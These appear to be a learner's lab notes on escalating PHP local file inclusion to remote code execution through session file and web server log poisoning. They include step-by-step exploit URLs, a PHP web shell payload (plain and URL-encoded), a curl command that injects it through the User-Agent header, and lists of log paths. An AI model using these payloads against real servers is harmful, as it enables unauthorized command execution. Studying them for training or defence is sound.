PHP Session Poisoning

PHPSESSID could possibly hold user-related data on the back-end.
/var/lib/php/sessions/
C:\windows\Temp

Exploit how?

Identify data that can be controlled and poisoned.

1. Locate a session file using LFI.

http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

2. Read the file and identify what can be controlled. In this case, en.php
   

3. Go to a page that doesn't exist and observe the PHP session log via LFI. Ensure that I have control over the session

http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning

http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

4. Inject php web shell

http://<SERVER_IP>:<PORT>/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E



bascially 
<?php
  system($_GET["cmd"]);
?>

5. Execute the web shell

http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

Server Log Poisoning

Targets: User-Agent header in access.log||error.log files from Apache||Nginx
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Nginx logs : Readable by low priv users

/var/log/nginx/
c:\nginx\log

Apache logs: Readable by high priv users

C:\xampp\apache\logs\
/var/log/apache2

Or other locations

/proc/self/environ
/proc/self/fd/N   # N = 0-50 
/var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log

Exploit Apache Server how?

1. Verify LFI.

http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log

2. Use Burp to modify User-Agent header field with exploit

<?php system($_GET[cmd]); ?>

OR curl

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET[cmd]); ?>"

4. Execute exploit

http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log?cmd=id